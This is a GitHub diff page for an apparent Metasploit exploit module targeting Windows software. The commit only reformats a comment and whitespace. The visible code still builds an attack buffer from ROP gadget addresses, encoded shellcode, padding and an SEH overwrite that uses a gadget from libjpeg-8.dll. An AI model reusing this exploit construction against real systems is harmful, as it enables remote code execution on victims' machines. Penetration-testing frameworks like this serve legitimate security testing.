File tree Expand file tree Collapse file tree 1 file changed +3
-2
lines changed
modules/exploits/windows/misc Expand file tree Collapse file tree 1 file changed +3
-2
lines changed Original file line number Diff line number Diff line change @@ -111,7 +111,7 @@ def exploit
111
111
packet << "\x6c \x7d \x37 \x6c " # NOP RETN
112
112
packet << "\x6c \x7d \x37 \x6c " # NOP RETN
113
113
packet << ropchain
114
- packet << payload . encoded # Shellcode
114
+ packet << payload . encoded # Shellcode
115
115
packet << rand_text_alpha ( target [ 'OffSet' ] - 892 - ropchain . length - payload . encoded . length )
116
116
117
117
# 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
@@ -125,7 +125,8 @@ def exploit
125
125
126
126
# When file is open with GUI interface. This is NSEH/SEH overwrite
127
127
packet << make_nops ( 4 ) # nseh
128
- packet << "\x55 \x59 \x80 \x6b " # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
128
+ # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
129
+ packet << "\x55 \x59 \x80 \x6b "
129
130
130
131
print_status ( "Preparing payload" )
131
132
filecontent = magic_header
You can’t perform that action at this time.
0 commit comments